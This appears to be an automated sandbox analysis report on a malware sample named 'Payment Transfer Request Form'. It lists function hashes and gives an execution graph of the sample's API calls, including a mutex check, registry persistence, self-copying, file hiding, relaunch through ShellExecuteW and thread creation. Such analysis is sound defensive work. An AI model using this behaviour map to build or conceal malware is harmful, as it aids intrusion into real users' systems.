                                              • Instruction ID: 9815250699506f3b784578a59246f48d890ec34acbe34f9060ad92954fe826df
                                              • Opcode Fuzzy Hash: b59c3dfc863daf7c4530711b3f52beba92fea317cfbd2bc1a2fa669c3ee59f0f
                                              • Instruction Fuzzy Hash: C1E10674E002598FDB14DFA9C581AAEFBF2BF89305F248169D408AB355DB31AD41CFA0
                                              Function 0260D51C Relevance: .3, Instructions: 264COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414443854.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2600000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c6e8bf5de987f7cb8276562b2133e6fd342b9a7b1ccc81f1d63831d673664089
                                              • Instruction ID: 8caba79f2a73e2f130c40a19ee12044fe27298afa9f7bc962e1810ab5886aec3
                                              • Opcode Fuzzy Hash: c6e8bf5de987f7cb8276562b2133e6fd342b9a7b1ccc81f1d63831d673664089
                                              • Instruction Fuzzy Hash: 42A15F36A002058FCF29DFB4D88099EB7B2FF85304B1585A9E805AB6A1DF75ED16DF40
                                              Function 06A95B27 Relevance: .1, Instructions: 125COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 98465763f7e55fa17d72df825963678d658e0f6f23ed0d293bf038f7c5136381
                                              • Instruction ID: 864f0376ef1aabb9c580868fb51aa967e8df2c51c04227f7c1a6a4fbe34c5c8b
                                              • Opcode Fuzzy Hash: 98465763f7e55fa17d72df825963678d658e0f6f23ed0d293bf038f7c5136381
                                              • Instruction Fuzzy Hash: 6B510874E102198FDB18DFA9C9815AEFBF2BF89305F24C56AD418AB315DB319941CFA0
                                              Function 02604607 Relevance: .0, Instructions: 33COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414443854.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2600000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 03034220ebf2b684e702f514f953dc0a238972e1a7de965ef2da7568a33dde6d
                                              • Instruction ID: 4296aaae9477dc9e933d0579a1ae93af00885beb85e64d4ed67ed4808dcec0f7
                                              • Opcode Fuzzy Hash: 03034220ebf2b684e702f514f953dc0a238972e1a7de965ef2da7568a33dde6d
                                              • Instruction Fuzzy Hash: 44F01283880EAE83DB2591B75CE42CEA780E76757CF695355D378023E2BFA0D153D245

                                              Execution Graph

                                              Execution Coverage:1.9%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:2%
                                              Total number of Nodes:748
                                              Total number of Limit Nodes:19
                                              execution_graph 45801 439be8 45804 439bf4 _swprintf ___DestructExceptionObject 45801->45804 45802 439c02 45817 43ad91 20 API calls __dosmaperr 45802->45817 45804->45802 45805 439c2c 45804->45805 45812 442d9a EnterCriticalSection 45805->45812 45807 439c37 45813 439cd8 45807->45813 45809 439c07 ___DestructExceptionObject __cftof 45812->45807 45814 439ce6 45813->45814 45816 439c42 45814->45816 45819 446c9b 36 API calls 2 library calls 45814->45819 45818 439c5f LeaveCriticalSection std::_Lockit::~_Lockit 45816->45818 45817->45809 45818->45809 45819->45814 45820 40163e 45821 401646 45820->45821 45822 401649 45820->45822 45823 401688 45822->45823 45826 401676 45822->45826 45828 43229f 45823->45828 45825 40167c 45827 43229f new 22 API calls 45826->45827 45827->45825 45832 4322a4 45828->45832 45830 4322d0 45830->45825 45832->45830 45835 439adb 45832->45835 45842 440480 7 API calls 2 library calls 45832->45842 45843 4329bd RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45832->45843 45844 43301b RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45832->45844 45840 443649 ___crtLCMapStringA 45835->45840 45836 443687 45846 43ad91 20 API calls __dosmaperr 45836->45846 45837 443672 RtlAllocateHeap 45839 443685 45837->45839 45837->45840 45839->45832 45840->45836 45840->45837 45845 440480 7 API calls 2 library calls 45840->45845 45842->45832 45845->45840 45846->45839 45847 43263c 45848 432648 ___DestructExceptionObject 45847->45848 45874 43234b 45848->45874 45850 43264f 45852 432678 45850->45852 46135 4327ae IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 45850->46135 45859 4326b7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 45852->45859 46136 441763 5 API calls TranslatorGuardHandler 45852->46136 45854 432691 45856 432697 ___DestructExceptionObject 45854->45856 46137 441707 5 API calls TranslatorGuardHandler 45854->46137 45857 432717 45885 4328c9 45857->45885 45859->45857 46138 4408e7 35 API calls 6 library calls 45859->46138 45875 432354 45874->45875 46143 4329da IsProcessorFeaturePresent 45875->46143 45877 432360 46144 436cd1 10 API calls 4 library calls 45877->46144 45879 432365 45884 432369 45879->45884 46145 4415bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45879->46145 45881 432380 45881->45850 45882 432372 45882->45881 46146 436cfa 8 API calls 3 library calls 45882->46146 45884->45850 46147 434c30 45885->46147 45888 43271d 45889 4416b4 45888->45889 46149 44c239 45889->46149 45891 4416bd 45892 432726 45891->45892 46153 443d25 35 API calls 45891->46153 45894 40d3f0 45892->45894 46155 41a8da LoadLibraryA GetProcAddress 45894->46155 45896 40d40c 46162 40dd83 45896->46162 45898 40d415 46177 4020d6 45898->46177 45901 4020d6 28 API calls 45902 40d433 45901->45902 46183 419d87 45902->46183 45906 40d445 46209 401e6d 45906->46209 45908 40d44e 45909 40d461 45908->45909 45910 40d4b8 45908->45910 46438 40e609 116 API calls 45909->46438 46215 401e45 45910->46215 45913 40d4c6 45917 401e45 22 API calls 45913->45917 45914 40d473 45915 401e45 22 API calls 45914->45915 45916 40d47f 45915->45916 46439 40f98d 36 API calls __EH_prolog 45916->46439 45918 40d4e5 45917->45918 46220 4052fe 45918->46220 45921 40d4f4 46225 408209 45921->46225 45922 40d491 46440 40e5ba 77 API calls 45922->46440 45926 40d49a 46441 40dd70 70 API calls 45926->46441 45935 401fb8 11 API calls 45936 40d520 45935->45936 45937 401e45 22 API calls 45936->45937 45938 40d529 45937->45938 46242 401fa0 45938->46242 45940 40d534 45941 401e45 22 API calls 45940->45941 45942 40d54f 45941->45942 45943 401e45 22 API calls 45942->45943 45944 40d569 45943->45944 45945 40d5cf 45944->45945 46442 40822a 28 API calls 45944->46442 45947 401e45 22 API calls 45945->45947 45952 40d5dc 45947->45952 45948 40d594 45949 401fc2 28 API calls 45948->45949 45950 40d5a0 45949->45950 45953 401fb8 11 API calls 45950->45953 45951 40d650 45957 40d660 CreateMutexA GetLastError 45951->45957 45952->45951 45954 401e45 22 API calls 45952->45954 45955 40d5a9 45953->45955 45956 40d5f5 45954->45956 46443 411f34 RegOpenKeyExA RegQueryValueExA RegCloseKey 45955->46443 45960 40d5fc OpenMutexA 45956->45960 45958 40d987 45957->45958 45959 40d67f GetModuleFileNameW 45957->45959 45962 401fb8 11 API calls 45958->45962 46002 40d9ec 45958->46002 46246 4192ae 45959->46246 45964 40d622 45960->45964 45965 40d60f WaitForSingleObject CloseHandle 45960->45965 45987 40d99a ___scrt_fastfail 45962->45987 46444 411f34 RegOpenKeyExA RegQueryValueExA RegCloseKey 45964->46444 45965->45964 45967 40d5c5 45967->45945 45969 40dd0f 45967->45969 45968 40d6a0 45970 40d6f5 45968->45970 45972 401e45 22 API calls 45968->45972 46476 41239a 30 API calls 45969->46476 45974 401e45 22 API calls 45970->45974 45981 40d6bf 45972->45981 45976 40d720 45974->45976 45975 40dd22 46477 410eda 65 API calls ___scrt_fastfail 45975->46477 45982 40d731 45976->45982 45983 40d72c 45976->45983 45978 40d63b 45978->45951 46445 41239a 30 API calls 45978->46445 45979 40dcfa 45984 402073 28 API calls 45979->45984 46010 40dd6a 45979->46010 45981->45970 45988 40d6f7 45981->45988 45995 40d6db 45981->45995 45986 401e45 22 API calls 45982->45986 46449 40e501 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 45983->46449 45989 40dd3a 45984->45989 45994 40d73a 45986->45994 46457 4120e8 RegOpenKeyExA RegQueryValueExA RegCloseKey 45987->46457 46447 411eea RegOpenKeyExA RegQueryValueExA RegCloseKey 45988->46447 46478 4052dd 28 API calls 45989->46478 46001 401e45 22 API calls 45994->46001 45995->45970 46446 4067a0 36 API calls ___scrt_fastfail 45995->46446 45997 40d70d 45997->45970 46000 40d712 45997->46000 46448 4066a6 58 API calls 46000->46448 46006 40d755 46001->46006 46007 401e45 22 API calls 46002->46007 46012 401e45 22 API calls 46006->46012 46009 40da10 46007->46009 46458 402073 46009->46458 46479 413980 161 API calls _strftime 46010->46479 46015 40d76f 46012->46015 46017 401e45 22 API calls 46015->46017 46016 40da22 46464 41215f 14 API calls 46016->46464 46019 40d789 46017->46019 46023 401e45 22 API calls 46019->46023 46020 40da38 46021 401e45 22 API calls 46020->46021 46022 40da44 46021->46022 46465 439867 39 API calls _strftime 46022->46465 46026 40d7a3 46023->46026 46025 40d810 46025->45987 46032 401e45 22 API calls 46025->46032 46042 40d8a7 46025->46042 46026->46025 46028 401e45 22 API calls 46026->46028 46027 40da51 46029 40da7e 46027->46029 46466 41aa4f 81 API calls ___scrt_fastfail 46027->46466 46037 40d7b8 _wcslen 46028->46037 46031 402073 28 API calls 46029->46031 46034 40da8d 46031->46034 46035 40d831 46032->46035 46033 40da70 CreateThread 46033->46029 46756 41b212 10 API calls 46033->46756 46036 402073 28 API calls 46034->46036 46039 401e45 22 API calls 46035->46039 46038 40da9c 46036->46038 46037->46025 46044 401e45 22 API calls 46037->46044 46467 4194da 79 API calls 46038->46467 46041 40d843 46039->46041 46048 401e45 22 API calls 46041->46048 46067 40d89f ___scrt_fastfail 46042->46067 46043 40daa1 46045 401e45 22 API calls 46043->46045 46046 40d7d3 46044->46046 46047 40daad 46045->46047 46050 401e45 22 API calls 46046->46050 46052 401e45 22 API calls 46047->46052 46049 40d855 46048->46049 46054 401e45 22 API calls 46049->46054 46051 40d7e8 46050->46051 46263 40c5ed 46051->46263 46053 40dabf 46052->46053 46057 401e45 22 API calls 46053->46057 46056 40d87e 46054->46056 46062 401e45 22 API calls 46056->46062 46059 40dad5 46057->46059 46065 401e45 22 API calls 46059->46065 46061 40d807 46451 401ee9 46061->46451 46064 40d88f 46062->46064 46321 40b871 46064->46321 46066 40daf5 46065->46066 46468 439867 39 API calls _strftime 46066->46468 46067->46042 46454 412338 31 API calls 46067->46454 46070 40d942 ctype 46074 401e45 22 API calls 46070->46074 46072 40db02 46073 401e45 22 API calls 46072->46073 46075 40db0d 46073->46075 46076 40d959 46074->46076 46077 401e45 22 API calls 46075->46077 46076->46002 46079 401e45 22 API calls 46076->46079 46078 40db1e 46077->46078 46469 408f1f 166 API calls _wcslen 46078->46469 46080 40d976 46079->46080 46455 419bca 28 API calls 46080->46455 46083 40d982 46456 40de34 88 API calls 46083->46456 46084 40db33 46086 401e45 22 API calls 46084->46086 46088 40db3c 46086->46088 46087 40db83 46089 401e45 22 API calls 46087->46089 46088->46087 46090 43229f new 22 API calls 46088->46090 46095 40db91 46089->46095 46091 40db53 46090->46091 46092 401e45 22 API calls 46091->46092 46093 40db65 46092->46093 46098 40db6c CreateThread 46093->46098 46094 40dbd9 46097 401e45 22 API calls 46094->46097 46095->46094 46096 43229f new 22 API calls 46095->46096 46099 40dba5 46096->46099 46103 40dbe2 46097->46103 46098->46087 46757 417f6a 101 API calls 2 library calls 46098->46757 46100 401e45 22 API calls 46099->46100 46101 40dbb6 46100->46101 46106 40dbbd CreateThread 46101->46106 46102 40dc4c 46104 401e45 22 API calls 46102->46104 46103->46102 46105 401e45 22 API calls 46103->46105 46108 40dc55 46104->46108 46107 40dbfc 46105->46107 46106->46094 46760 417f6a 101 API calls 2 library calls 46106->46760 46110 401e45 22 API calls 46107->46110 46109 40dc99 46108->46109 46112 401e45 22 API calls 46108->46112 46474 4195f8 79 API calls 46109->46474 46113 40dc11 46110->46113 46115 40dc69 46112->46115 46470 40c5a1 31 API calls 46113->46470 46114 40dca2 46475 401ef3 28 API calls 46114->46475 46120 401e45 22 API calls 46115->46120 46117 40dcad 46119 401ee9 11 API calls 46117->46119 46122 40dcb6 CreateThread 46119->46122 46123 40dc7e 46120->46123 46121 40dc24 46471 401ef3 28 API calls 46121->46471 46127 40dce5 46122->46127 46128 40dcd9 CreateThread 46122->46128 46761 40e18d 122 API calls 46122->46761 46472 439867 39 API calls _strftime 46123->46472 46126 40dc30 46129 401ee9 11 API calls 46126->46129 46127->45979 46130 40dcee CreateThread 46127->46130 46128->46127 46755 410b5c 137 API calls 46128->46755 46132 40dc39 CreateThread 46129->46132 46130->45979 46758 411140 38 API calls ___scrt_fastfail 46130->46758 46132->46102 46759 401bc9 49 API calls _strftime 46132->46759 46133 40dc8b 46473 40b0a3 7 API calls 46133->46473 46135->45850 46136->45854 46137->45859 46138->45857 46143->45877 46144->45879 46145->45882 46146->45884 46148 4328dc GetStartupInfoW 46147->46148 46148->45888 46150 44c24b 46149->46150 46151 44c242 46149->46151 46150->45891 46154 44c138 48 API calls 4 library calls 46151->46154 46153->45891 46154->46150 46156 41a919 LoadLibraryA GetProcAddress 46155->46156 46157 41a909 GetModuleHandleA GetProcAddress 46155->46157 46158 41a947 GetModuleHandleA GetProcAddress 46156->46158 46159 41a937 GetModuleHandleA GetProcAddress 46156->46159 46157->46156 46160 41a973 24 API calls 46158->46160 46161 41a95f GetModuleHandleA GetProcAddress 46158->46161 46159->46158 46160->45896 46161->46160 46480 419493 FindResourceA 46162->46480 46165 439adb _Yarn 21 API calls 46166 40ddad _Yarn 46165->46166 46483 402097 46166->46483 46169 401fc2 28 API calls 46170 40ddd3 46169->46170 46171 401fb8 11 API calls 46170->46171 46172 40dddc 46171->46172 46173 439adb _Yarn 21 API calls 46172->46173 46174 40dded _Yarn 46173->46174 46489 4062ee 46174->46489 46176 40de20 46176->45898 46178 4020ec 46177->46178 46179 4023ae 11 API calls 46178->46179 46180 402106 46179->46180 46181 402549 28 API calls 46180->46181 46182 402114 46181->46182 46182->45901 46541 4020bf 46183->46541 46185 419e0a 46186 401fb8 11 API calls 46185->46186 46187 419e3c 46186->46187 46188 401fb8 11 API calls 46187->46188 46190 419e44 46188->46190 46189 419e0c 46547 404182 28 API calls 46189->46547 46193 401fb8 11 API calls 46190->46193 46195 40d43c 46193->46195 46194 419e18 46196 401fc2 28 API calls 46194->46196 46205 40e563 46195->46205 46198 419e21 46196->46198 46197 401fc2 28 API calls 46204 419d9a 46197->46204 46199 401fb8 11 API calls 46198->46199 46201 419e29 46199->46201 46200 401fb8 11 API calls 46200->46204 46548 41ab9a 28 API calls 46201->46548 46204->46185 46204->46189 46204->46197 46204->46200 46545 404182 28 API calls 46204->46545 46546 41ab9a 28 API calls 46204->46546 46206 40e56f 46205->46206 46208 40e576 46205->46208 46549 402143 11 API calls 46206->46549 46208->45906 46210 402143 46209->46210 46211 40217f 46210->46211 46550 402710 11 API calls 46210->46550 46211->45908 46213 402164 46551 4026f2 11 API calls std::_Deallocate 46213->46551 46216 401e4d 46215->46216 46217 401e55 46216->46217 46552 402138 22 API calls 46216->46552 46217->45913 46221 4020bf 11 API calls 46220->46221 46222 40530a 46221->46222 46553 403280 46222->46553 46224 405326 46224->45921 46557 4051cf 46225->46557 46227 408217 46561 402035 46227->46561 46230 401fc2 46231 401fd1 46230->46231 46232 402019 46230->46232 46233 4023ae 11 API calls 46231->46233 46239 401fb8 46232->46239 46234 401fda 46233->46234 46235 40201c 46234->46235 46236 401ff5 46234->46236 46237 40265a 11 API calls 46235->46237 46576 403078 28 API calls 46236->46576 46237->46232 46240 4023ae 11 API calls 46239->46240 46241 401fc1 46240->46241 46241->45935 46243 401fb2 46242->46243 46244 401fa9 46242->46244 46243->45940 46577 4025c0 28 API calls 46244->46577 46578 419f23 46246->46578 46251 401fc2 28 API calls 46252 4192ea 46251->46252 46253 401fb8 11 API calls 46252->46253 46254 4192f2 46253->46254 46255 411f91 31 API calls 46254->46255 46257 419348 46254->46257 46256 41931b 46255->46256 46258 419326 StrToIntA 46256->46258 46257->45968 46259 41933d 46258->46259 46260 419334 46258->46260 46262 401fb8 11 API calls 46259->46262 46586 41accf 22 API calls 46260->46586 46262->46257 46587 401f66 46263->46587 46266 40c629 46597 41959f 29 API calls 46266->46597 46267 40c65e 46270 419f23 GetCurrentProcess 46267->46270 46268 40c752 GetLongPathNameW 46591 40415e 46268->46591 46269 40c61f 46269->46268 46273 40c663 46270->46273 46276 40c667 46273->46276 46277 40c6b9 46273->46277 46274 40c632 46598 401ef3 28 API calls 46274->46598 46281 40415e 28 API calls 46276->46281 46280 40415e 28 API calls 46277->46280 46279 40415e 28 API calls 46282 40c776 46279->46282 46283 40c6c7 46280->46283 46284 40c675 46281->46284 46610 40c7f9 28 API calls 46282->46610 46289 40415e 28 API calls 46283->46289 46290 40415e 28 API calls 46284->46290 46285 401ee9 11 API calls 46285->46269 46287 40c789 46288 402f85 28 API calls 46287->46288 46291 40c794 46288->46291 46292 40c6dd 46289->46292 46293 40c68b 46290->46293 46294 402f85 28 API calls 46291->46294 46295 402f85 28 API calls 46292->46295 46599 402f85 46293->46599 46297 40c79e 46294->46297 46298 40c6e8 46295->46298 46301 401ee9 11 API calls 46297->46301 46609 401ef3 28 API calls 46298->46609 46305 40c7a8 46301->46305 46303 40c6f3 46306 401ee9 11 API calls 46303->46306 46304 40c6a1 46307 401ee9 11 API calls 46304->46307 46308 401ee9 11 API calls 46305->46308 46310 40c6fc 46306->46310 46311 40c6aa 46307->46311 46309 40c7b1 46308->46309 46312 401ee9 11 API calls 46309->46312 46313 401ee9 11 API calls 46310->46313 46314 401ee9 11 API calls 46311->46314 46315 40c7ba 46312->46315 46316 40c63c 46313->46316 46314->46316 46317 401ee9 11 API calls 46315->46317 46316->46285 46318 40c7c3 46317->46318 46319 401ee9 11 API calls 46318->46319 46320 40c7cc 46319->46320 46450 401ef3 28 API calls 46320->46450 46322 40b887 _wcslen 46321->46322 46323 40b891 46322->46323 46324 40b8e2 46322->46324 46327 40b89a CreateDirectoryW 46323->46327 46325 40c5ed 31 API calls 46324->46325 46326 40b8f7 46325->46326 46712 401ef3 28 API calls 46326->46712 46654 4081c7 46327->46654 46330 40b8dc 46333 401ee9 11 API calls 46330->46333 46331 40b8b9 46332 402ff4 28 API calls 46331->46332 46334 40b8c5 46332->46334 46338 40b90e 46333->46338 46711 401ef3 28 API calls 46334->46711 46336 40b8d3 46337 401ee9 11 API calls 46336->46337 46337->46330 46339 40b941 46338->46339 46340 40b927 46338->46340 46341 40b94a CopyFileW 46339->46341 46343 40b77f 31 API calls 46340->46343 46342 40b9f5 46341->46342 46346 40b95c _wcslen 46341->46346 46661 40b77f 46342->46661 46344 40b938 46343->46344 46344->46067 46346->46342 46348 40b9b9 46346->46348 46349 40b979 46346->46349 46352 40c5ed 31 API calls 46348->46352 46353 40c5ed 31 API calls 46349->46353 46350 40ba12 46356 40ba1b SetFileAttributesW 46350->46356 46351 40ba3e 46359 40415e 28 API calls 46351->46359 46354 40b9be 46352->46354 46355 40b984 46353->46355 46714 401ef3 28 API calls 46354->46714 46358 402ff4 28 API calls 46355->46358 46369 40ba2a _wcslen 46356->46369 46361 40b990 46358->46361 46362 40ba58 46359->46362 46360 40b9b7 46363 401ee9 11 API calls 46360->46363 46364 402ff4 28 API calls 46361->46364 46687 402ff4 46362->46687 46366 40b9d0 46363->46366 46367 40b99c 46364->46367 46374 40b9d9 CopyFileW 46366->46374 46713 401ef3 28 API calls 46367->46713 46369->46351 46373 40ba3b SetFileAttributesW 46369->46373 46371 40b9a5 46375 401ee9 11 API calls 46371->46375 46372 401ee9 11 API calls 46376 40ba6d 46372->46376 46373->46351 46374->46342 46377 40b9e6 46374->46377 46378 40b9ae 46375->46378 46379 40415e 28 API calls 46376->46379 46377->46344 46380 401ee9 11 API calls 46378->46380 46382 40ba7b 46379->46382 46380->46360 46381 40bb46 46383 40415e 28 API calls 46381->46383 46382->46381 46384 40415e 28 API calls 46382->46384 46385 40bb55 46383->46385 46386 40bab4 46384->46386 46387 40415e 28 API calls 46385->46387 46388 40415e 28 API calls 46386->46388 46389 40bb65 46387->46389 46390 40bac7 46388->46390 46692 4042fd 46389->46692 46391 402ff4 28 API calls 46390->46391 46393 40bad5 46391->46393 46395 402f85 28 API calls 46393->46395 46397 40bae4 46395->46397 46396 402f85 28 API calls 46398 40bb82 46396->46398 46399 402ff4 28 API calls 46397->46399 46400 402ff4 28 API calls 46398->46400 46401 40baf0 46399->46401 46402 40bb91 46400->46402 46404 402ff4 28 API calls 46401->46404 46697 40323d 46402->46697 46406 40bafc 46404->46406 46408 40323d 28 API calls 46406->46408 46407 401ee9 11 API calls 46409 40bba8 46407->46409 46410 40bb07 46408->46410 46411 401ee9 11 API calls 46409->46411 46412 401ee9 11 API calls 46410->46412 46413 40bbb4 46411->46413 46414 40bb10 46412->46414 46415 401ee9 11 API calls 46413->46415 46416 401ee9 11 API calls 46414->46416 46417 40bbc0 46415->46417 46418 40bb19 46416->46418 46419 401ee9 11 API calls 46417->46419 46420 401ee9 11 API calls 46418->46420 46421 40bbc9 46419->46421 46422 40bb22 46420->46422 46424 401ee9 11 API calls 46421->46424 46423 401ee9 11 API calls 46422->46423 46425 40bb2e 46423->46425 46429 40bbd2 46424->46429 46426 401ee9 11 API calls 46425->46426 46427 40bb3a 46426->46427 46428 401ee9 11 API calls 46427->46428 46428->46381 46701 41a17b 46429->46701 46431 40bc0c 46432 40bc3c 46431->46432 46434 40bc23 ShellExecuteW 46431->46434 46433 401ee9 11 API calls 46432->46433 46435 40bc45 46433->46435 46434->46432 46436 40bc35 ExitProcess 46434->46436 46437 401ee9 11 API calls 46435->46437 46437->46344 46438->45914 46439->45922 46440->45926 46442->45948 46443->45967 46444->45978 46445->45951 46446->45970 46447->45997 46448->45970 46449->45982 46450->46061 46452 402232 11 API calls 46451->46452 46453 401ef2 46452->46453 46453->46025 46454->46070 46455->46083 46456->45958 46457->46002 46459 40207b 46458->46459 46460 4023ae 11 API calls 46459->46460 46461 402086 46460->46461 46750 4024cd 46461->46750 46464->46020 46465->46027 46466->46033 46467->46043 46468->46072 46469->46084 46470->46121 46471->46126 46472->46133 46473->46109 46474->46114 46475->46117 46476->45975 46754 418ccd 104 API calls 46479->46754 46481 4194b0 LoadResource LockResource SizeofResource 46480->46481 46482 40dd9e 46480->46482 46481->46482 46482->46165 46484 40209f 46483->46484 46492 4023ae 46484->46492 46486 4020aa 46496 4024ea 46486->46496 46488 4020b9 46488->46169 46490 402097 28 API calls 46489->46490 46491 406302 46490->46491 46491->46176 46493 402408 46492->46493 46494 4023b8 46492->46494 46493->46486 46494->46493 46503 402787 11 API calls std::_Deallocate 46494->46503 46497 4024fa 46496->46497 46498 402500 46497->46498 46499 402515 46497->46499 46504 402549 46498->46504 46514 4028c8 46499->46514 46502 402513 46502->46488 46503->46493 46525 402868 46504->46525 46506 40255d 46507 402572 46506->46507 46508 402587 46506->46508 46530 402a14 22 API calls 46507->46530 46510 4028c8 28 API calls 46508->46510 46513 402585 46510->46513 46511 40257b 46531 4029ba 22 API calls 46511->46531 46513->46502 46515 4028d1 46514->46515 46516 402933 46515->46516 46517 4028db 46515->46517 46539 402884 22 API calls 46516->46539 46520 4028e4 46517->46520 46522 4028f7 46517->46522 46533 402c8e 46520->46533 46523 4028f5 46522->46523 46524 4023ae 11 API calls 46522->46524 46523->46502 46524->46523 46526 402870 46525->46526 46527 402878 46526->46527 46532 402c83 22 API calls 46526->46532 46527->46506 46530->46511 46531->46513 46534 402c98 __EH_prolog 46533->46534 46540 402e34 22 API calls 46534->46540 46536 4023ae 11 API calls 46538 402d72 46536->46538 46537 402d04 46537->46536 46538->46523 46540->46537 46542 4020c7 46541->46542 46543 4023ae 11 API calls 46542->46543 46544 4020d2 46543->46544 46544->46204 46545->46204 46546->46204 46547->46194 46548->46185 46549->46208 46550->46213 46551->46211 46555 40328a 46553->46555 46554 4032a9 46554->46224 46555->46554 46556 4028c8 28 API calls 46555->46556 46556->46554 46558 4051db 46557->46558 46567 405254 46558->46567 46560 4051e8 46560->46227 46562 402041 46561->46562 46563 4023ae 11 API calls 46562->46563 46564 40205b 46563->46564 46572 40265a 46564->46572 46568 405262 46567->46568 46571 402884 22 API calls 46568->46571 46573 40266b 46572->46573 46574 4023ae 11 API calls 46573->46574 46575 40206d 46574->46575 46575->46230 46576->46232 46577->46243 46579 419f30 GetCurrentProcess 46578->46579 46580 4192bc 46578->46580 46579->46580 46581 411f91 RegOpenKeyExA 46580->46581 46582 411fbf RegQueryValueExA RegCloseKey 46581->46582 46583 411fe9 46581->46583 46582->46583 46584 402073 28 API calls 46583->46584 46585 411ffe 46584->46585 46585->46251 46586->46259 46588 401f6e 46587->46588 46611 402232 46588->46611 46590 401f79 46590->46266 46590->46267 46590->46269 46592 404166 46591->46592 46593 402232 11 API calls 46592->46593 46594 404171 46593->46594 46616 40419c 46594->46616 46597->46274 46598->46316 46600 402f94 46599->46600 46601 402fd6 46600->46601 46606 402fcb 46600->46606 46636 40321f 46601->46636 46603 402fd4 46629 403242 46603->46629 46635 4031f1 28 API calls 46606->46635 46608 401ef3 28 API calls 46608->46304 46609->46303 46610->46287 46612 40228c 46611->46612 46613 40223c 46611->46613 46612->46590 46613->46612 46615 402759 11 API calls std::_Deallocate 46613->46615 46615->46612 46617 4041a8 46616->46617 46620 4041b9 46617->46620 46619 40417c 46619->46279 46621 4041c9 46620->46621 46622 4041e6 46621->46622 46623 4041cf 46621->46623 46628 4027c6 28 API calls 46622->46628 46627 404247 28 API calls 46623->46627 46626 4041e4 46626->46619 46627->46626 46628->46626 46630 40324e 46629->46630 46631 402232 11 API calls 46630->46631 46632 403268 46631->46632 46639 402316 46632->46639 46635->46603 46643 403686 46636->46643 46638 40322c 46638->46603 46640 402327 46639->46640 46641 402232 11 API calls 46640->46641 46642 4023a7 46641->46642 46642->46608 46644 402868 22 API calls 46643->46644 46645 403699 46644->46645 46646 40370c 46645->46646 46647 4036be 46645->46647 46653 402884 22 API calls 46646->46653 46651 4036d0 46647->46651 46652 4027c6 28 API calls 46647->46652 46651->46638 46652->46651 46655 401f66 11 API calls 46654->46655 46656 4081d3 46655->46656 46715 40312c 46656->46715 46658 4081f0 46659 40323d 28 API calls 46658->46659 46660 4081f8 46659->46660 46660->46331 46662 40b7e3 46661->46662 46663 40b7a5 46661->46663 46664 40b826 46662->46664 46666 40a8cc 28 API calls 46662->46666 46720 40a8cc 46663->46720 46667 40b869 46664->46667 46669 40a8cc 28 API calls 46664->46669 46671 40b7fc 46666->46671 46667->46350 46667->46351 46672 40b83f 46669->46672 46670 402ff4 28 API calls 46673 40b7c3 46670->46673 46674 402ff4 28 API calls 46671->46674 46675 402ff4 28 API calls 46672->46675 46727 412204 RegCreateKeyW 46673->46727 46677 40b806 46674->46677 46678 40b849 46675->46678 46680 412204 14 API calls 46677->46680 46681 412204 14 API calls 46678->46681 46683 40b81a 46680->46683 46684 40b85d 46681->46684 46682 401ee9 11 API calls 46682->46662 46685 401ee9 11 API calls 46683->46685 46686 401ee9 11 API calls 46684->46686 46685->46664 46686->46667 46733 403202 46687->46733 46689 403002 46690 403242 11 API calls 46689->46690 46691 403011 46690->46691 46691->46372 46693 40321f 28 API calls 46692->46693 46694 40430b 46693->46694 46695 403242 11 API calls 46694->46695 46696 40431a 46695->46696 46696->46396 46698 40321f 46697->46698 46699 403686 28 API calls 46698->46699 46700 40322c 46699->46700 46700->46407 46702 41a18e CreateFileW 46701->46702 46704 41a1c7 46702->46704 46705 41a1cb 46702->46705 46704->46431 46706 41a1d2 SetFilePointer 46705->46706 46707 41a1eb WriteFile 46705->46707 46706->46707 46710 41a1e2 CloseHandle 46706->46710 46708 41a200 CloseHandle 46707->46708 46709 41a1fe 46707->46709 46708->46704 46709->46708 46710->46704 46711->46336 46712->46330 46713->46371 46714->46360 46717 403136 46715->46717 46716 403155 46716->46658 46717->46716 46719 4027c6 28 API calls 46717->46719 46719->46716 46721 401f66 11 API calls 46720->46721 46722 40a8d8 46721->46722 46723 40312c 28 API calls 46722->46723 46724 40a8f4 46723->46724 46725 40323d 28 API calls 46724->46725 46726 40a907 46725->46726 46726->46670 46728 412257 46727->46728 46730 412219 46727->46730 46729 401ee9 11 API calls 46728->46729 46731 40b7d7 46729->46731 46732 412232 RegSetValueExW RegCloseKey 46730->46732 46731->46682 46732->46728 46734 40320e 46733->46734 46737 4035f8 46734->46737 46736 40321b 46736->46689 46738 403606 46737->46738 46739 403624 46738->46739 46740 40360c 46738->46740 46741 40363c 46739->46741 46742 40367e 46739->46742 46743 403686 28 API calls 46740->46743 46747 403622 46741->46747 46748 4027c6 28 API calls 46741->46748 46749 402884 22 API calls 46742->46749 46743->46747 46747->46736 46748->46747 46751 4024d9 46750->46751 46752 4024ea 28 API calls 46751->46752 46753 402091 46752->46753 46753->46016 46762 411253 61 API calls 46755->46762

                                              Executed Functions

